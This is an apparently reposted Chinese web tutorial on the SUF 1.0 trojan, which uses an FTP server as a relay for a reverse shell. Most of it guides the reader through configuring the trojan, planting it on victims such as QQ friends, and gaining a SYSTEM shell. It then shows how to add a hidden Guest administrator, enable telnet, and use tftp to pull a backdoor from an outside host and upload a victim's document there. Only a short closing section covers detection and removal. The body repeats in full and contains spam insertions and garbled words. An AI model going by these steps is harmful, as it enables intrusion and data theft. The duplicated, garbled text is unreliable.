网络入侵也玩双通道
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
一个14岁的男孩经过无数次的实验,推出了一款全新的木马——SUF 1.0,该后门运用了“反弹端口原理”与“FTP 隧道技术”,也就是两台机器不直接传输数据,而是利用第三台机器(FTP服务器)来交换数据.
SUF(Shell Use Ftp)顾名思义,就是通过FTP的Shell。这种奇妙的思路真叫绝的,它充分利用防火墙“外严内不严”的漏洞,客户端生成服务端后,把客户端主机的IP发送到FTP里,然后别人运行服务端后下载IP文件,然后通过反向连接,使客户端知道服务端上线,然后把要执行的命令发送到FTP里,服务端再读取FTP里要执行的命令,完成执行。
说了这么一大堆,SUF是不是真的有这么厉害?用事实来说明一切,跟我来……
一、摩拳擦掌——配置服务端
和一般的木马后门大体相同,将下载下来的SUF 1.0解压缩,双击运行其中的client.exe,出现主窗口,非常简洁明了吧!点击“配置服务端”按钮,弹出了配置对话窗口,这里仅需要配置一下FTP服务选项。在“FTP”栏中填入一个有写权限的FTP服务器,如Ftp.abc.或者220.202.242.98。接着在“端口”栏中填写好FTP服务器端口,默认为21。再在“用户名”和“密码”栏中输入FTP帐户名称和密码,点击“配置服务器”,出现一提示对话框,点击“确定”,这时程序就会开始验证FTP服务器,验证成功后请选择木马服务端(server.exe)的路径,完成配置。
小提示如果要给服务端加壳,请在配置服务端之前给服务端(server.exe)加壳,服务端是可重复配置的。一定要确保使用的FTP帐户对FTP服务器有写的权限。
二、玩弄骨掌——轻松来控制
接下来是玩木马后门必不可少的环节,那就是种植木马。种植木马的方法、途径有很多,以前也专门有文章介绍过,大家可以发挥自己的聪明才智,把服务端上传到肉鸡或者发给QQ好友等,当服务端程序被运行后,一般的使用者很难感觉到计算机有异常,防火墙也不会出现报警。其实,一只黑手正在慢慢靠近,服务端程序会自动从FTP服务器中获取客户端的IP地址,然后开始反向连接,这时服务端计算机的IP地址就会出现在客户端的“上线列表”中。
小提示客户端计算机必须是直接连接到Inter,而不能是处于内网中,,如果开启了防火墙的话,请打开5915端口。
在“上线列表”中双击某一在线计算机的IP(例如220.202.242.100),出现“连接到220.202.242.100”对话窗口,这就已经得到了目标计算机的一个系统权限的Shell,现在想干什么就自由发挥吧!
想想既然是送上门的肉鸡,还是留个后门,以便日后光顾吧!这里就将Guest帐户激活,并提升为管理员,再开启目标计算机的Tel服务,狼蚁网站SEO优化就看如何来实现?请输入命令 user guest /active:yes,点击“运行”来激活Guest帐户,再运行命令 localgroup administrators guest /add,将Guest加入管理员组,再运行命令 start tel,开启目标计算机的远程登录服务。
其实,在这里有很多东东可以应用的,比如可以通过FTP命令或者TFTP来远程下载/上传文件。这里假设已经知道有一个TFTP服务器220.202.242.99,我们从服务器上下载一个后门程序Sy.exe,只要运行命令tftp 220.202.242.99 get sy.exe;要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只要运行命令tftp 220.202.242.99 put Ccash.doc。
小提示Windows自身附带了一个简单的文件上传下载程序Tftp.exe,可要建立TFTP服务器,就得借助TFTPD32了。
三、摆脱控制——隔离隧道
虽然SUF 1.0的实现方法非常隐蔽,可还是能够将其剿灭的,可以借助Active Ports(下载地址http://.ldcatv./soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了SUF后门,就可在“Active Ports”主窗口中发现两个server.exe进程,其中一个通过4319端口与FTP服务器进行通讯,另一个通过4321端口与客户端计算机进行通讯。选择它们,再点击“Terminate Process”来结束进程。然后在资源管理器中将server.exe删除,这样就摆脱了SUF的控制。
SUF(Shell Use Ftp)顾名思义,就是通过FTP的Shell。这种奇妙的思路真叫绝的,它充分利用防火墙“外严内不严”的漏洞,客户端生成服务端后,把客户端主机的IP发送到FTP里,然后别人运行服务端后下载IP文件,然后通过反向连接,使客户端知道服务端上线,然后把要执行的命令发送到FTP里,服务端再读取FTP里要执行的命令,完成执行。
说了这么一大堆,SUF是不是真的有这么厉害?用事实来说明一切,跟我来……
一、摩拳擦掌——配置服务端
和一般的木马后门大体相同,将下载下来的SUF 1.0解压缩,双击运行其中的client.exe,出现主窗口,非常简洁明了吧!点击“配置服务端”按钮,弹出了配置对话窗口,这里仅需要配置一下FTP服务选项。在“FTP”栏中填入一个有写权限的FTP服务器,如Ftp.abc.或者220.202.242.98。接着在“端口”栏中填写好FTP服务器端口,默认为21。再在“用户名”和“密码”栏中输入FTP帐户名称和密码,点击“配置服务器”,出现一提示对话框,点击“确定”,这时程序就会开始验证FTP服务器,验证成功后请选择木马服务端(server.exe)的路径,完成配置。
小提示如果要给服务端加壳,请在配置服务端之前给服务端(server.exe)加壳,服务端是可重复配置的。一定要确保使用的FTP帐户对FTP服务器有写的权限。
二、玩弄骨掌——轻松来控制
接下来是玩木马后门必不可少的环节,那就是种植木马。种植木马的方法、途径有很多,以前也专门有文章介绍过,大家可以发挥自己的聪明才智,把服务端上传到肉鸡或者发给QQ好友等,当服务端程序被运行后,一般的使用者很难感觉到计算机有异常,防火墙也不会出现报警。其实,一只黑手正在慢慢靠近,服务端程序会自动从FTP服务器中获取客户端的IP地址,然后开始反向连接,这时服务端计算机的IP地址就会出现在客户端的“上线列表”中。
小提示客户端计算机必须是直接连接到Inter,而不能是处于内网中,,如果开启了防火墙的话,请打开5915端口。
在“上线列表”中双击某一在线计算机的IP(例如220.202.242.100),出现“连接到220.202.242.100”对话窗口,这就已经得到了目标计算机的一个系统权限的Shell,现在想干什么就自由发挥吧!
想想既然是送上门的肉鸡,还是留个后门,以便日后光顾吧!这里就将Guest帐户激活,并提升为管理员,再开启目标计算机的Tel服务,狼蚁网站SEO优化就看如何来实现?请输入命令 user guest /active:yes,点击“运行”来激活Guest帐户,再运行命令 localgroup administrators guest /add,将Guest加入管理员组,再运行命令 start tel,开启目标计算机的远程登录服务。
其实,在这里有很多东东可以应用的,比如可以通过FTP命令或者TFTP来远程下载/上传文件。这里假设已经知道有一个TFTP服务器220.202.242.99,我们从服务器上下载一个后门程序Sy.exe,只要运行命令tftp 220.202.242.99 get sy.exe;要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只要运行命令tftp 220.202.242.99 put Ccash.doc。
小提示Windows自身附带了一个简单的文件上传下载程序Tftp.exe,可要建立TFTP服务器,就得借助TFTPD32了。
三、摆脱控制——隔离隧道
虽然SUF 1.0的实现方法非常隐蔽,可还是能够将其剿灭的,可以借助Active Ports(下载地址http://.ldcatv./soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了SUF后门,就可在“Active Ports”主窗口中发现两个server.exe进程,其中一个通过4319端口与FTP服务器进行通讯,另一个通过4321端口与客户端计算机进行通讯。选择它们,再点击“Terminate Process”来结束进程。然后在资源管理器中将server.exe删除,这样就摆脱了SUF的控制。
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座